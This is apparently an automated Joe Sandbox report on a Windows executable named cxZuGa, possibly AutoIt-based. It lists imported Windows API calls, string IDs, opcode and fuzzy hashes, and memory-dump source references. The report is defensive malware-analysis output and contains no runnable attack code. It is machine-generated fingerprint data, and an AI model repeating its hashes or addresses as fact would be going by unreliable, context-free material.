                                                            • API String ID: 1424370930-2873401336
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
                                                            • API String ID: 1424370930-2873401336
                                                            APIs
                                                            Similarity
                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                            • String ID:
                                                            • API String ID: 3220332590-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: f$p
                                                            • API String ID: 3215553584-1290815066
                                                            APIs
                                                            Similarity
                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                            • String ID:
                                                            • API String ID: 3859894641-0
                                                            APIs
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                            • String ID:
                                                            • API String ID: 2592858361-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2082702847-0
                                                            APIs
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1653399731-2785691316
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF7EC1BBF47), ref: 00007FF7EC1BCE29
                                                            Strings
                                                            Similarity
                                                            • API ID: BuffCharLower
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 2358735015-567219261
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00007FF7EC190EDB
                                                              • Part of subcall function 00007FF7EC190B90: CharUpperBuffW.USER32(?,?,00000001,00007FF7EC190F61), ref: 00007FF7EC190C6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharForegroundUpperWindow
                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: #$E$O
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                            • String ID: \*.*
                                                            Similarity
                                                            • API ID: MessageSend$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            Similarity
                                                            • API ID: ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            Similarity
                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                            • String ID:
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                            • String ID:
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                            • String ID:
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                            • String ID:
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC1BC2BF), ref: 00007FF7EC1BD176
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC1BC2BF), ref: 00007FF7EC1BD217
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC1BC2BF), ref: 00007FF7EC1BD236
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC1BC2BF), ref: 00007FF7EC1BD281
                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC1BC2BF), ref: 00007FF7EC1BD2A0
                                                              • Part of subcall function 00007FF7EC144120: WideCharToMultiByte.KERNEL32 ref: 00007FF7EC144160
                                                              • Part of subcall function 00007FF7EC144120: WideCharToMultiByte.KERNEL32 ref: 00007FF7EC14419C
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                            • String ID:
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType
                                                            • String ID:
                                                            • API String ID: 4136290138-0
                                                            • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                            • Instruction ID: a3b7edc3dbe2ba1b55124951c10d90d790ebb77dddcda2ec51a9de51c5331d64
                                                            • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                            • Instruction Fuzzy Hash: 255187B7624B8492DB50DF19E4847AD77B5FB84B80F828122CB4D43764EF39E468C712
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                            • Instruction ID: be877cc46acb3c437c137f84d1f00575e4e6b54e4095c39039c6caf2998a3d90
                                                            • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                            • Instruction Fuzzy Hash: D251C2A660878285E760AF21B440379FB95EF40BA0F994276DE6E077D4DE7CE441C313
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String
                                                            • String ID:
                                                            • API String ID: 2832842796-0
                                                            • Opcode ID: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                            • Instruction ID: 0b58e111b0f84bdb82de2bc30ac1fb0a9db0996f11c8eb804727d5a54a9d622c
                                                            • Opcode Fuzzy Hash: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                            • Instruction Fuzzy Hash: C3511D6AA18A4682DB14EF16E49066DB7A0FB88F94F548032EF8E47765CF3CD440C751
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                            • Instruction ID: 0a5b2f9475670eba5598f7a46a26b426d9affce1c8703a1946aca048fbb832de
                                                            • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                            • Instruction Fuzzy Hash: 095100BAB08681CBE758EF31E404669B764FB45794F500232FA5A43795CF38E861C711
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                            • Instruction ID: a95c20acca2a0857a2394007992e3e21f04195cac6d3445601b1bd8d30050930
                                                            • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                            • Instruction Fuzzy Hash: 9541C5A9F09A4681FA15AF1AB8007B5E395BF44BD0F894537DE1D4B398DE7CE400C322
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable
                                                            • String ID:
                                                            • API String ID: 2939132127-0
                                                            • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                            • Instruction ID: 8df73bbeee4f5fb7d9515fe496e9d0c904927c2072d29f702dcb4e7a0c7c4e82
                                                            • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                            • Instruction Fuzzy Hash: 9E51C67A90978681EB60DB15E444778BBA0EB85F85FA84537CE1D473A4CF3DE441C322
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                            • Instruction ID: 4e5c124ab7ee95fe761cdddb6510b25a4a1b2e63c80fa5fbe41dcec2fff57e90
                                                            • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                            • Instruction Fuzzy Hash: 8831F77AA0870587E710EF19F5443A9B791F788BA8F900132EE5E8B798CE3CE845C711
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                            • String ID:
                                                            • API String ID: 2655805287-0
                                                            • Opcode ID: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                            • Instruction ID: 03606d19442ca05345383e85f5fb7ef6f31c95210306d5d2c12b3aaa7544b382
                                                            • Opcode Fuzzy Hash: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
                                                            • Instruction Fuzzy Hash: 632129A6B0978245EB04EB16B904375A691FF89FE0F944532EE1D47795EE3CE440C311
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                            • Instruction ID: 4d3b1eda63b7f74b5dedf562c644aa8b4afd4d0c48e4dfbfd2bf4bd6f14d2b65
                                                            • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                            • Instruction Fuzzy Hash: 9B21D6AAB08641C2EB04EF27F4842ADE7A0FB89F90B444036EE0D87755DE38D445C751
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                            • Instruction ID: ad17f7f222c1d9db94c3721c5fbcdf796eae07658135fa6e40f44c579ae553e2
                                                            • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                            • Instruction Fuzzy Hash: 67314BBA918742C6E344AF02B84033AFBA5FB89B90FD44136D9594B754CF7CE455CB22
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2067211477-0
                                                            • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                            • Instruction ID: c45214345c5261abeaab816fc0f5468b39ff565b8a145816b222e307c9735925
                                                            • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                            • Instruction Fuzzy Hash: 202180A9A0D78286EE56EF69F450379E291AF84B80F984433EB0D03758DF3CE404C622
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                            • Instruction ID: c5a941a8eb441273f1068a53e0fde302c4ae44fa6c8a098444b41f4c8f55546d
                                                            • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                            • Instruction Fuzzy Hash: A0118FAEE196834BFA54352DF44637591416F543A0F954237EB6E467DA8F3CA840C123
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                            • Instruction ID: d04926d86fa133a9ab311e8249c53358757070799170767abec910176d641e0c
                                                            • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                            • Instruction Fuzzy Hash: 5F11557A608B8186E710DF12F840269BBB4FB88F81B994436DF8907B18DF38E415C741
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                            • Instruction ID: 7e34eb6e64381e0f7276a6d64d038696e0bd95131514d11af250c7775087c9de
                                                            • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                            • Instruction Fuzzy Hash: B211367AA08B81C6E710DF56F840669BBB4FB88F81B994436DF8947B18DF38E815C741
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                            • Instruction ID: 378c03e84f77a87f3622df6af00345897775104ea52b617f689831a44161b31e
                                                            • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                            • Instruction Fuzzy Hash: 1C1130AA60CB4186EB00AB26F81032AA7A4EF85BC1F985436DF4D4B758CF3DD445C712
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                            • Instruction ID: 9e37665a992c95bdf5e587ac50957431bce7b1ca3b64e8eae2d7ede754af40cf
                                                            • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                            • Instruction Fuzzy Hash: D011C8A6A08A4282EB25BF28F444379A760FF84B45F844073D94E47298DF7CD589C322
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?,?,?,00007FF7EC1829AD,?,?,?,00007FF7EC132AB2), ref: 00007FF7EC1A003C
                                                            • TerminateThread.KERNEL32(?,?,?,00007FF7EC1829AD,?,?,?,00007FF7EC132AB2), ref: 00007FF7EC1A0047
                                                            • WaitForSingleObject.KERNEL32(?,?,?,00007FF7EC1829AD,?,?,?,00007FF7EC132AB2), ref: 00007FF7EC1A0055
                                                            • ~SyncLockT.VCCORLIB ref: 00007FF7EC1A005E
                                                              • Part of subcall function 00007FF7EC19F7B8: CloseHandle.KERNEL32(?,?,?,00007FF7EC1A0063,?,?,?,00007FF7EC1829AD,?,?,?,00007FF7EC132AB2), ref: 00007FF7EC19F7C9
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7EC1829AD,?,?,?,00007FF7EC132AB2), ref: 00007FF7EC1A006A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
